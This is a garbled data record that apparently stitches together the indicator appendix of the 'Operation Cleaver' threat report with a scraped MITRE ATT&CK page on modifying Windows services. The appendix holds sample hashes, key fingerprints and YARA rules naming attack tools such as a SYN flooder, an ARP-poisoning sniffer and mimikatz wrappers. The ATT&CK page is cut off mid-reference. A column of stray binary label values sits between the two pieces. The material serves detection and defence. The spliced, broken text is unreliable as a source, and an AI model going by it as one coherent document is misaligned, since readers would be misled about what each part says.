19d9b37d3acf3468887a4d41bf70e9aa 1c2bc564805695dbb3a26d9c9f7dffea 1c7e40443e36c4b7592617f0a271835d 1d8fd8c357907a79f3e6d9f831f2bd7d 21829130d5e2a69b0f6963c68b070127 2e36a3f3b888c1fd3c3aa3f1ba7969ad 30120cf30ea4d870635893cd75338f97 304f7f17031af90012d4e4d1cc5cfb8a 336b501bd96e309f93c8d12960634248 38998ff6f9a3874b6943d7ac837d19c3 #OPCLEAVER 77 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 Samples (MD5) cont. 3b6260ead85b4f0d706203e062a34a21 41eeae4158152f49ab64601c4358a7a1 42714874f86fa9bd97e9be460d7d72c0 42e459d1d057bd937e0d00958e591f08 48dd515e2b148493cf47b0c0c5713573 491f031d0a9ad4919cb29cb2d9a9a65c 4e483762f555b078976a1ddf3fc3e532 53230e7d5739091a6eb51298a50eb616 537b42d3cd9812e5b583131b83a48508 53841511791e4cac6f0768a9eb5def8a 54def27d598b75f297a8cf2c97150997 5837ad676f6c0f0f4f48096648d6e81b 5a4046fd0825641766b197a2132d2410 5e5d6469b270aa60dc90ddfde32ba082 5eef1ee37714c9ee07653419890010d6 6061410c04b9fa9e47593611a02ff2dd 6094f64d54575a2d5a3fbd2d23c4f44e 61896424e995476b23f73a5c1c34af5e 61e307a651a7bbce78eb48c1d395501a 636c2d2855ac8a8693c4ef9e89c67205 641fc6831d8c215e9645cf5d4a8be5e5 68cfc418c72b58b770bdccf19805703e 69d80a27ab0c85ef073badbee7ec55c7 69f9705ecdcc709506f7665ad373c1a0 6cd5f1982693f2ce21effddf18f5baf5 6d4d21258eef96979ce6f2417c6c019f 6ef950941d114c09af359402620d7cba 735cdf3a3e9c06d88de31112782ef831 736aab6c731d098931d6a4bf11a8150e 758f2557922e360bff3d1565e6871ea1 765f3db4421bdf8bb953dffe37398453 78a63bc8433cea162e31a5865d5817c9 836ef6b06c5fd52ecc910a3e3408004a 84384d77ac9835720375943235d33a87 855239a2434a3bc78751d9ba9cfac900 8994e16b14cde144a9cebdff685d8676 9376e5b754ccd94f7c66b811d81e240e 948c570269059928517f155b4b6db1a4 94ef4f98b9c321f74778811f64c68d03 96e372dea573714d34e394550059b1d7 9838f7ead2023061eb79587243910daa 985e86ac1854585d2771fd173b63b98b OPERATION CLEAVER 78 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 Samples (MD5) cont. 9a48bee62c41c0640e9564cc37f718bf 9bcb8091ba414a38bfb7a39eccf3f6bc 9e00a52caec6385e0ab1e21e9794a5b0 9ef9ec11c9f83dde38556feaf88b2a29 9feee6fe54ee4ec859f7bad0d798ac4e ad94daecadbac8a54e81a69cacc41441 ad99db10c0c12eaea09b39568a761b52 adf77661a409b5a1304d08b62a1264f5 af58d803b2e0b5d0f194c25ff85a8d81 afdfafb2c1e2af1a48e833da8f35bb83 b163fcda16d8fe860a906f768ef27bc8 b2d78ecce135e008adc3e80915f69798 b3d5e1ff7a7ff10cd738b215f92d1ad5 b7ddb09bdc0d0eb39c364d9b9d6436cc baa76a571329cdc4d7e98c398d80450c bd9fbbbd7dab62ed6a56d00f21c4c67e be6273ebd472a2a499a6c1e48ae81112 be741520f13a2bf8bc064a73e146bf08 bfc59f1f442686af73704eff6c0226f0 c1b5464c0506bea6cf778dd18fa456cc c440ec0a8cf7341b746160a684c51741 c5282f088b90de1ab758424b152d34ac c91887d861d9bd4a5872249b641bc9f9 cb52f84d462ac67bde53eec40128408c cbe05db979444589211e830487df7610 d000071a6bf49da390fef8f12aa9e3f8 d84c3d678f269a0c6beb22ed266efac0 de56ca66423fc5e42808445f2b5631d3 de56ca66423fc5e42808445f2b5631d3 de744bcb7c63b035b6c5c3ec0279c3ac e0f6c5fdde04fbf8cd1a42f75cb06248 e4c9e8f28894e89d6270ad6a4c6cd064 e4e5f1efe44ac06bc3672fd1d8f85630 e5428bcae8b4e84cb5186ad5c83ffc98 e7428dec7deb041692d6575e069c1cf0 e8b1f23616f9d8493e8a1bf0ca0f512a e8ea10d5cde2e8661e9512fb684c4c98 eac61634da4513a10b596e6c8c299126 eb48c318e8fd9a2a7a18da6578db05d6 f1301bad6da06f436e3a3de0244848e1 f3d80d813dc6a239d921169c57c5789d fa7c9a78eda0f3bb9ff8ec827d5bc9ff #OPCLEAVER 79 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 Samples (SHA-256) 039ce41fb40a27a46c43bf7ef7d1b08cd5e3f6d71ec08e140cd9166247e783af 0510efd8eae869cd0773a033d5a46d6b7f0162174019e54618887f3085312fcb 064e47074342a6e026de068adaf48c41b2ec2c341c7514768cb7b39425905524 08065f658d65773e583e9ca784148117d87be3a5005a0871cbc4446f42ed5040 0ce968ea8cffb6312f6d17af9044a14f79d6427b9038bcfc6212acb5aa23e74b 0d1f479842cd5bde4f18ab8c85a099da39e13a4051a7c21334e33d55b6f18d76 0fee562cd821f53e864e02b00a59780aed63abca9f7502678fca9bf47b8b12bd 10647c4e7b1b741aeaea9b16d8eb5dae3237ce00dc69f6843790767a277b6204 10cf7a186897243363278cf0283a1687749d9ba43fa713b9f974050f56e97cca 15121b7cbd15143fc0118e06ebe70b7dc1e239b21d865b2c750ed8a0f1f00ef2 1578a4c641f0c7913cdf08267d1a88ac384d586c453b922670be380b7e67a179 1698d8168e860c3377646b12444d38a2e6aebba5a499504a5fc0a73b91d89407 1756ba79cd63458a50df86203380824ea855c8d6bf1c673e05a13a62f14cd170 1aa25a930e8bae5abbe75907c335c7d1d875b60f72f02855a8d37daadc6b469f 1efad3bce90ac1d2011ba686f1ab0e435b9a709763fb238dbcad0f44acddccbe 20dddd8651a26161139b49dfabfb3b4b743c57fcc982afc11d1c5c4264a2a8be 2a13730f8f16e04cece490eee53bbdcc9bd1e01fbbc2a758562a6462d9473742 2db6f74a8aef9fe86aef5dff3334e8dd252ac45e26b4a12e8641a770bbb08b45 2e32c6c9179750df7f1ab35536f09c6b09c73faccea7325fe5c79b5087f5dd6f 32aa8f19e452a1471640cd7be72f806e1997fd5a1a2b2743898ee4cd0aed0dc5 37af3f3b3c43690a2e73d4b5edb968896ec4da7b2c21b12a94e146a10f07fef8 39ba1710545fc9e123abbbce61bda1b00525e59346570a3f8c36f7adde5bb47e 3a7ebd7f502fd3f6b3b88693b1123147621b4030c21df9e0690864e8969e149a 3bdbf591fa0d81606929fdf6abe44ba6e185dd8fc0fa62ade8afde48f704d11a 3d18e18ae97045cc3198026ddc681e7d957a25402b79141a3c6fdc18bb879ad6 3fa302449da1e4fad81143cc48fc80034cbc41804f00e00ac17bdb7dba0b992d 42ca980b7fc7892716a923c7bf3ff6a76ce81f81bd0a83bea40a1735f33b36b8 45a2ea5226c1ce11e8955c99d5b58fd3baa66fb53436be63cb099e96ef30db43 48437fe7d7d0c5fbde340e1392662f7fc421fc05d7c9824f71160475105ad999 4f131095ba56f6d3621a007985ac758d780b0c837f554f6e44d535ed55d33af1 508c7691d535102538aaa6dce32d750c2492dada36506a390c1959f261a0244b 50d11ad32eb72b128185a0aecf39be8085b6b1a8f30cb41d8bc177a1ff8f3067 550a33353730579a7d2b9276cc3b66ca252a59e198285c732fcda46513351c03 5ac9f4e25ef4002274496e18ea537b4c582a3acf3126cc1830a63941d9c91e64 5d1e81f5a4fca25b7afb18eb906c9a53965d81dcf62f9d91499baf03229a8de8 5fb4ae33cac8b2b74e63fc639eeb969a660ef9a7e8310c2769acc925122f047e 616a25378f70474bcb3ad0fad2f1383009c5b7b3cea937be2a5234a110d64b78 634685e43e9f73343cb337ec64a8679485e1ddb4c2de5ecb6a5746aa5ddb1b72 6474f74340e7199919e7532c6756cf459cd20c3391852d80b058eb7997a31e9f 650f143ac0a668536b6750a628ec51e7ca28f5520105eeb87308f557cd74e63c 65509837e15b6a914b611c2d5066ba06ded39b0bed288552e65df20610e35976 OPERATION CLEAVER 80 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 Samples (SHA-256) cont. 65509837e15b6a914b611c2d5066ba06ded39b0bed288552e65df20610e35976 67a2b9c32653161fafaea231b6661d9d797bb0964c79c9ee46cf2bf76571ed45 6888723e56f2e7696ac1e1910f68a1d54d7c76e9eb8e69554980b04e881e0e86 7199acca3d851889efa4a5a42b3f55010f4916294201ce5ad20c76898200ffa9 75b77606175ee696395f1b0e6850d5cd6596e34f74804b30c9bf9e368ebcd299 7890a726603edcd70b6e6f3de367cf891131d833d14c506b26e07935a715048f 79ca080a152bd44f9b07af0f940c303e45e10d516633384f5b3d34a29d0d03c8 7b9fd4b9b36cf84fcbcb3e9bf589d8a51c2166558baf462ab312929fbb584642 80ed4e7a242ee3d1c2656affb04cd56e7262e5a6bf2bec2f8435aa3f47c9b5d1 8129345ce66643d880a3e01e607399279dec7bf9cadc06d9b26134f6d205ed06 8813bd0b4ad6c6155b571c9c1fbcabfeed3812ab8fbd9acd8372385094aaa565 8f02dfd900760cb2c84e4f5a859512f5d719daae063a719c956cbf6185004da5 8f9a45ba73c67ba9c4958ea49508c350a0e1c3caf476ccab2fb8cb3049e3ba46 902f2391b1075e14985bc91316c98cdcf3442ecaeb3ef12422813f946ab8409e 9801f7c552cbcf8c413dade920b96be2eaad9624ba4adaf17f80f815dac58974 9aec3f14ec69e9942a7d3075bb5479dc5fa61e6c2a03cbee1a9269264efac51c 9ba06cb9dcd05e6866ee0e9ecc0c9a480d5b6c8d177ef1907d7fcc02e2871806 9ebbd300ddf70bccbecfe3bf47898e5959cfc090cef8716e2e638d840a24007b a321158d7f5be572ac5536ad57cb4a312bea52430b03da9dda97f4548a080bc3 aa23c55bed562cbf47c84092d0a35b0da35e3db3982a18a28fb45ca70ac6b399 aa7ac2a053ceba819fcd1c8b273db64296c2754a8101291870e142519c416b1b abb0ebd57cf2b0d54cd2b01fd9b11ccd9ed68053174d131922811a9ad22459ea ac272bd9701c5d9cb7e8d1a4e2a191a894e98aa463fb17628c52da16612627d8 ad06e03fdd9eff480ca623ea23ec87c794d99ae6dda308c979fa5173b2b8a514 ad5fbf8e381d92225aa6c022e2bbc175be0e33138b5fa4bbb508b970b33bbc1e ad71283aadb2455f7a1cd4e8283c789599c33d328da44965f6c282f2e600e1b2 aebac79b820891510b9e14ef97892875bf4197797ca91aef149acdc1e6bf6a7c af8deedc78097c387926bb95ebd6ab2a870349794f452f35f84132b0dbe12e09 b18f80a02d45eaed618993447c82916ad8802e552dddccf733a3698794d8cb9d b275caf4cbc4f47b3d772886172438b81a2e11ff5a8683be488de4b219b39070 b42ef5f39aaf6e52ff4e0510b6e5c3fb5c84bf35befcde8bcc18dc86bccbdfb4 b49706b7d5432a368070ee58aa8776cce1ddc2098e863b1b7b36d7b7d79fe6a9 b4d4c421bc70e5a3345d4b8c9d1090ff16ff82870bd38216bb8bac7f1088dafb b99cddd428e78ede109c7bd3683c374ac6010a15c0633939511e39c1ed99f621 bb2b135c7a9b366ec7090404761a9ee9e7c03c56d68165a6789a29e804104068 be4cc2d1504002107a77bb943ad2d22c205cdcc6ad4804c0440970e5e922d30d bf7746d29330b666d82b153989d41406305572b92f6b24a1f1adef6374b58328 bfa66edd0d9ae2c8179893ee881f479b37dce0ce8220a8a18e1b42a879ddff4a c11a244cba9da30173ff1dcb755a377c3b2b1f99cd15a887041937b086113ebd c1c1e5b43b1ac9af79aafa59a6062468142afc2278b6fea0bb4dbbb83af65d06 #OPCLEAVER 81 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 Samples (SHA-256) cont. c30a2fe22050dcac30616a3d27d5c92ea2815d060b365747984913758a209aaa c74df42cfc7c7221f7f28c67bd726a1caad8453fc35daddfb094aaeede2e8e1e c9010e060de6a83c3802ed4e6b7f544e6eb2b5420ee2be5c71646e6a27182bea c901d84878f50a93ab76f2ea31763bebb0acf0c0f9ad86b3abf98e5cde499332 c99fa90038cec60d9aa21a49e537ad9ea55672ed78cf5b429cb4c75ebc5ccd69 c9fc8133e755c14cb02872ba05a2332baefe5e94797479aded46c3db83a7cc14 ca7138bfe08b480386653072482e58f6c48b05a1e7fb8a82cc042806eae9acc2 caa769a21bf97987de4cc92874eaa03e7b0538082c502606aa8ca97823e2e2aa cd75664edea18e3aa303763e6f6c639b3e90ead4b51c2b3e41c808e3d968c848 cffba2a145d91bdecfa8cb32af6964576889faa04591b503a58507cf89ab7cae d045ea925cf461da5c58cc2af8a0f96ec7c961ea62ffcf1de0b04abf9b0fa8ac d11b504b18bc8615e98f3c37d98c6fe11216a0f070a056414ca4407fc298fbd6 d3c2488d321ca6760986fc1a55a3c1db3f7b215fc2883d7e4fabc2871b5a27ac d4e54c1bc1efba20d75861c01bb2cc053b1ab9fadae29bf6c4c04528110056e6 d5d1fa5b5474089e59c05ca88a96257d4449d852b429c620aa773408bd48d067 d8c7aef47bac024188d929e749e90ac172fd51b8f6e16dec4b6635dc2ffa85ef dc21a2189f9e2d63872c0b5ee7ec75316799c60eb018ba9b98398b69efe45365 dc22e4b5ef752d3ec47d7bb3de7534e4a2daa2642de8c9839ad262d33a7aa7dc e180f933aad709883acde441ee64407d49fa4183ae5130480005a0e81a0de491 e250bce96e5f0c162dbe4d87a1a7d65deb910f59c0bea1140897c22eb9dca501 e2e9d60c76225db77668440ff698eacef48b544ffab1ae0c641dcedb5ad570bd e339c7b77113f1a1c4c2f7e307b785cc4fc9145663fe3a612079240efcc9ac93 e3b38627d9e94a7e084e12cbd2acf7e66ce90021972061f8b9b61316eddb3bd6 e401340020688cdd0f5051b7553815eee6bc04a5a962900883f1b3676bf1de53 e4d43cd20d4ea59f68c26d46c30e1819cac5b9552d27fce826b0855494018267 e509843b2c061fa5e6ea7d11554bb22f36e6b79b7cd5cc0639ff63d48ce66336 ed85c3f8d2cccbb6a0ec2b4b27b158b4dbc6885245081901dd51eb2266f4b2bf ee33dd17802ca906fcc68815ff2a7d12ac7fab7f1c272a56444e4fd6715a6227 eea0dcabaabef075081e23fc91b84e07042117bb0362e59f11b17338108d0c1b f7e1a74e08c5718de9edc57facc26dda97ae5b723420a06ef56f1f6f8aa6fb5a fbc531e83359310e2940ffff180a26e28d55396710c748e2ae7e64357273a09d fd4a9af7ba67f794a83a720539666e89f288686a432b5c7133033a2ebde266cc Public/Private Key Fingerprints 0A:E1:AE:85:6A:BB:D5:87:BF:8E:21:4E:92:E6:1F:8C 70:70:2F:11:2B:01:03:4A:70:D9:5E:11:CC:E9:7A:16 6F:DB:BB:BA:DA:7F:FA:4B:3F:A1:C3:46:5E:4B:8F:31:E8:31:F1:EC 78:BE:02:06:B3:1E:57:DF:62:4E:30:16:ED:AA:5C:56:F7:E8:11:62 OPERATION CLEAVER 82 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 YARA Signatures rule BackDoorLogger { strings: $s1 = \xe2\x80\x9cBackDoorLogger\xe2\x80\x9d $s2 = \xe2\x80\x9czhuAddress\xe2\x80\x9d condition: all of them } rule Jasus { strings: $s1 = \xe2\x80\x9cpcap_dump_open\xe2\x80\x9d $s2 = \xe2\x80\x9cResolving IPs to poison...\xe2\x80\x9d $s3 = \xe2\x80\x9cWARNNING: Gateway IP can not be found\xe2\x80\x9d condition: all of them } rule LoggerModule { strings: $s1 = \xe2\x80\x9c%s-%02d%02d%02d%02d%02d.r\xe2\x80\x9d $s2 = \xe2\x80\x9cC:\\\\Users\\\\%s\\\\AppData\\\\Cookies\\\\\xe2\x80\x9d condition: all of them } rule NetC { strings: $s1 = \xe2\x80\x9cNetC.exe\xe2\x80\x9d wide $s2 = \xe2\x80\x9cNet Service\xe2\x80\x9d condition: all of them } rule ShellCreator2 { strings: $s1 = \xe2\x80\x9cShellCreator2.Properties\xe2\x80\x9d $s2 = \xe2\x80\x9cset_IV\xe2\x80\x9d condition: all of them } #OPCLEAVER 83 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 YARA Signatures (cont.) rule SmartCopy2 { strings: $s1 = \xe2\x80\x9cSmartCopy2.Properties\xe2\x80\x9d $s2 = \xe2\x80\x9cZhuFrameWork\xe2\x80\x9d condition: all of them } rule SynFlooder { strings: $s1 = \xe2\x80\x9cUnable to resolve [ %s ]. ErrorCode %d\xe2\x80\x9d $s2 = \xe2\x80\x9cyour target\xe2\x80\x99s IP is : %s\xe2\x80\x9d $s3 = \xe2\x80\x9cRaw TCP Socket Created successfully.\xe2\x80\x9d condition: all of them } rule TinyZBot { strings: $s1 = \xe2\x80\x9cNetScp\xe2\x80\x9d wide $s2 = \xe2\x80\x9cTinyZBot.Properties.Resources.resources\xe2\x80\x9d $s3 = \xe2\x80\x9cAoao WaterMark\xe2\x80\x9d $s4 = \xe2\x80\x9cRun_a_exe\xe2\x80\x9d $s5 = \xe2\x80\x9cnetscp.exe\xe2\x80\x9d $s6 = \xe2\x80\x9cget_MainModule_WebReference_DefaultWS\xe2\x80\x9d $s7 = \xe2\x80\x9cremove_CheckFileMD5Completed\xe2\x80\x9d $s8 = \xe2\x80\x9chttp://tempuri.org/\xe2\x80\x9d $s9 = \xe2\x80\x9cZhoupin_Cleaver\xe2\x80\x9d condition: ($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or $s9) } rule ZhoupinExploitCrew { strings: $s1 = \xe2\x80\x9czhoupin exploit crew\xe2\x80\x9d nocase $s2 = \xe2\x80\x9czhopin exploit crew\xe2\x80\x9d nocase condition: 1 of them } OPERATION CLEAVER 84 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 YARA Signatures (cont.) rule antivirusdetector { strings: $s1 = \xe2\x80\x9cgetShadyProcess\xe2\x80\x9d $s2 = \xe2\x80\x9cgetSystemAntiviruses\xe2\x80\x9d $s3 = \xe2\x80\x9cAntiVirusDetector\xe2\x80\x9d condition: all of them } rule csext { strings: $s1 = \xe2\x80\x9cCOM+ System Extentions\xe2\x80\x9d $s2 = \xe2\x80\x9ccsext.exe\xe2\x80\x9d $s3 = \xe2\x80\x9cCOM_Extentions_bin\xe2\x80\x9d condition: all of them } rule kagent { strings: $s1 = \xe2\x80\x9ckill command is in last machine, going back\xe2\x80\x9d $s2 = \xe2\x80\x9cmessage data length in B64: %d Bytes\xe2\x80\x9d condition: all of them } rule mimikatzWrapper { strings: $s1 = \xe2\x80\x9cmimikatzWrapper\xe2\x80\x9d $s2 = \xe2\x80\x9cget_mimikatz\xe2\x80\x9d condition: all of them } rule pvz_in { strings: $s1 = \xe2\x80\x9cLAST_TIME=00/00/0000:00:00PM$\xe2\x80\x9d $s2 = \xe2\x80\x9cif %%ERRORLEVEL%% == 1 GOTO line\xe2\x80\x9d condition: all of them } #OPCLEAVER 85 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 YARA Signatures (cont.) rule pvz_out { strings: $s1 = \xe2\x80\x9cNetwork Connectivity Module\xe2\x80\x9d wide $s2 = \xe2\x80\x9cOSPPSVC\xe2\x80\x9d wide condition: all of them } rule wndTest { strings: $s1 = \xe2\x80\x9c[Alt]\xe2\x80\x9d wide $s2 = \xe2\x80\x9c<< %s >>:\xe2\x80\x9d wide $s3 = \xe2\x80\x9cContent-Disposition: inline; comp=%s; account=%s; product=%d;\xe2\x80\x9d condition: all of them } rule zhCat { strings: $s1 = \xe2\x80\x9czhCat -l -h -tp 1234\xe2\x80\x9d $s2 = \xe2\x80\x9cABC ( A Big Company )\xe2\x80\x9d wide condition: all of them } rule zhLookUp { strings: $s1 = \xe2\x80\x9czhLookUp.Properties\xe2\x80\x9d condition: all of them } rule zhmimikatz { strings: $s1 = \xe2\x80\x9cMimikatzRunner\xe2\x80\x9d $s2 = \xe2\x80\x9czhmimikatz\xe2\x80\x9d condition: all of them } OPERATION CLEAVER 86 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 #OPCLEAVER 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64","1","1","0","1","1","1","1","0","0","1","0","0","0","0","0","1","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","1","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","1"
-"Modify Existing Service - Enterprise | MITRE ATT&CK\xe2\x84\xa2 Matrices Tactics PRE-ATT&CK Enterprise Mobile Techniques PRE-ATT&CK Enterprise Mobile Mitigations Enterprise Mobile Groups Software Resources General Information Getting Started ATT&CKcon Working with ATT&CK FAQ Updates Previous Versions Related Projects Blog\xc2 Contribute Register to stream ATT&CKcon 2.0 October 29-30 ENTERPRISE ENTERPRISE MOBILE PRE-ATT&CK TECHNIQUES All Initial Access Drive-by Compromise Exploit Public-Facing Application External Remote Services Hardware Additions Replication Through Removable Media Spearphishing Attachment Spearphishing Link Spearphishing via Service Supply Chain Compromise Trusted Relationship Valid Accounts Execution AppleScript CMSTP Command-Line Interface Compiled HTML File Control Panel Items Dynamic Data Exchange Execution through API Execution through Module Load Exploitation for Client Execution Graphical User Interface InstallUtil Launchctl Local Job Scheduling LSASS Driver Mshta PowerShell Regsvcs/Regasm Regsvr32 Rundll32 Scheduled Task Scripting Service Execution Signed Binary Proxy Execution Signed Script Proxy Execution Source Space after Filename Third-party Software Trap Trusted Developer Utilities User Execution Windows Management Instrumentation Windows Remote Management XSL Script Processing Persistence .bash_profile and .bashrc Accessibility Features Account Manipulation AppCert DLLs AppInit DLLs Application Shimming Authentication Package BITS Jobs Bootkit Browser Extensions Change Default File Association Component Firmware Component Object Model Hijacking Create Account DLL Search Order Hijacking Dylib Hijacking External Remote Services File System Permissions Weakness Hidden Files and Directories Hooking Hypervisor Image File Execution Options Injection Kernel Modules and Extensions Launch Agent Launch Daemon Launchctl LC_LOAD_DYLIB Addition Local Job Scheduling Login Item Logon Scripts LSASS Driver Modify Existing Service Netsh Helper DLL New Service Office Application Startup Path Interception Plist Modification Port Knocking Port Monitors Rc.common Re-opened Applications Redundant Access Registry Run Keys / Startup Folder Scheduled Task Screensaver Security Support Provider Service Registry Permissions Weakness Setuid and Setgid Shortcut Modification SIP and Trust Provider Hijacking Startup Items System Firmware Systemd Service Time Providers Trap Valid Accounts Web Shell Windows Management Instrumentation Event Subscription Winlogon Helper DLL Privilege Escalation Access Token Manipulation Accessibility Features AppCert DLLs AppInit DLLs Application Shimming Bypass User Account Control DLL Search Order Hijacking Dylib Hijacking Exploitation for Privilege Escalation Extra Window Memory Injection File System Permissions Weakness Hooking Image File Execution Options Injection Launch Daemon New Service Path Interception Plist Modification Port Monitors Process Injection Scheduled Task Service Registry Permissions Weakness Setuid and Setgid SID-History Injection Startup Items Sudo Sudo Caching Valid Accounts Web Shell Defense Evasion Access Token Manipulation Binary Padding BITS Jobs Bypass User Account Control Clear Command History CMSTP Code Signing Compile After Delivery Compiled HTML File Component Firmware Component Object Model Hijacking Control Panel Items DCShadow Deobfuscate/Decode Files or Information Disabling Security Tools DLL Search Order Hijacking DLL Side-Loading Execution Guardrails Exploitation for Defense Evasion Extra Window Memory Injection File Deletion File Permissions Modification File System Logical Offsets Gatekeeper Bypass Group Policy Modification Hidden Files and Directories Hidden Users Hidden Window HISTCONTROL Image File Execution Options Injection Indicator Blocking Indicator Removal from Tools Indicator Removal on Host Indirect Command Execution Install Root Certificate InstallUtil Launchctl LC_MAIN Hijacking Masquerading Modify Registry Mshta Network Share Connection Removal NTFS File Attributes Obfuscated Files or Information Plist Modification Port Knocking Process Doppelg\xc3\xa4nging Process Hollowing Process Injection Redundant Access Regsvcs/Regasm Regsvr32 Rootkit Rundll32 Scripting Signed Binary Proxy Execution Signed Script Proxy Execution SIP and Trust Provider Hijacking Software Packing Space after Filename Template Injection Timestomp Trusted Developer Utilities Valid Accounts Virtualization/Sandbox Evasion Web Service XSL Script Processing Credential Access Account Manipulation Bash History Brute Force Credential Dumping Credentials in Files Credentials in Registry Exploitation for Credential Access Forced Authentication Hooking Input Capture Input Prompt Kerberoasting Keychain LLMNR/NBT-NS Poisoning and Relay Network Sniffing Password Filter DLL Private Keys Securityd Memory Two-Factor Authentication Interception Discovery Account Discovery Application Window Discovery Browser Bookmark Discovery Domain Trust Discovery File and Directory Discovery Network Service Scanning Network Share Discovery Network Sniffing Password Policy Discovery Peripheral Device Discovery Permission Groups Discovery Process Discovery Query Registry Remote System Discovery Security Software Discovery System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery System Service Discovery System Time Discovery Virtualization/Sandbox Evasion Lateral Movement AppleScript Application Deployment Software Distributed Component Object Model Exploitation of Remote Services Logon Scripts Pass the Hash Pass the Ticket Remote Desktop Protocol Remote File Copy Remote Services Replication Through Removable Media Shared Webroot SSH Hijacking Taint Shared Content Third-party Software Windows Admin Shares Windows Remote Management Collection Audio Capture Automated Collection Clipboard Data Data from Information Repositories Data from Local System Data from Network Shared Drive Data from Removable Media Data Staged Email Collection Input Capture Man in the Browser Screen Capture Video Capture Command and Control Commonly Used Port Communication Through Removable Media Connection Proxy Custom Command and Control Protocol Custom Cryptographic Protocol Data Encoding Data Obfuscation Domain Fronting Domain Generation Algorithms Fallback Channels Multi-hop Proxy Multi-Stage Channels Multiband Communication Multilayer Encryption Port Knocking Remote Access Tools Remote File Copy Standard Application Layer Protocol Standard Cryptographic Protocol Standard Non-Application Layer Protocol Uncommonly Used Port Web Service Exfiltration Automated Exfiltration Data Compressed Data Encrypted Data Transfer Size Limits Exfiltration Over Alternative Protocol Exfiltration Over Command and Control Channel Exfiltration Over Other Network Medium Exfiltration Over Physical Medium Scheduled Transfer Impact Data Destruction Data Encrypted for Impact Defacement Disk Content Wipe Disk Structure Wipe Endpoint Denial of Service Firmware Corruption Inhibit System Recovery Network Denial of Service Resource Hijacking Runtime Data Manipulation Service Stop Stored Data Manipulation Transmitted Data Manipulation Home Techniques Enterprise Modify Existing Service Modify Existing Service Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg. Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of Masquerading that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. [1] [2] ID:\xc2 T1031 Tactic: Persistence Platform:\xc2 Windows Permissions Required:\xc2 Administrator, SYSTEM Data Sources:\xc2 Windows Registry, File monitoring, Process monitoring, Process command-line parameters CAPEC ID: CAPEC-551 Contributors:\xc2 Travis Smith, Tripwire; Matthew Demaske, Adaptforward Version:\xc2 1.0 Mitigations Mitigation Description Audit Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. User Account Management Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Examples Name Description APT19 An APT19 Port 22 malware variant registers itself as a service. [16] APT32 APT32 modified Windows Services to ensure PowerShell scripts were loaded on the system. [14] Bankshot Bankshot can terminate a specific process by its process id. [6] [7] BBSRAT BBSRAT can modify service configurations. [11] Empire Empire can utilize built-in modules to modify service binaries and restore them to their original state. [5] GreyEnergy GreyEnergy chooses a service, drops a DLL file, and writes it to that serviceDLL Registry key. [8] Honeybee Honeybee has batch files that modify the system service COMSysApp to load a malicious DLL. [15] PlugX PlugX has a module to change service configurations as well as start, control, and delete services. [13] PoisonIvy PoisonIvy creates a Registry entry modifying the Logical Disk Manager service to point to a malicious DLL dropped to disk. [10] PowerSploit PowerSploit contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs. [3] [4] TYPEFRAME TYPEFRAME can delete services from the victim\xe2\x80\x99s machine. [12] Volgmer Volgmer installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry. [9] Detection Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence. [17] Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute cmd commands or scripts. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Services may also be modified through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data. References The Cyber (@r0wdy_). (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018. Microsoft. (2013, February 22). Set up Recovery Actions to Take Place When a Service Fails. Retrieved April 9, 2018. PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018. PowerSploit. (n.d.). PowerSploit. Retrieved February 6, 2018. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016. Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018. US-CERT. (2017, December 13). Malware 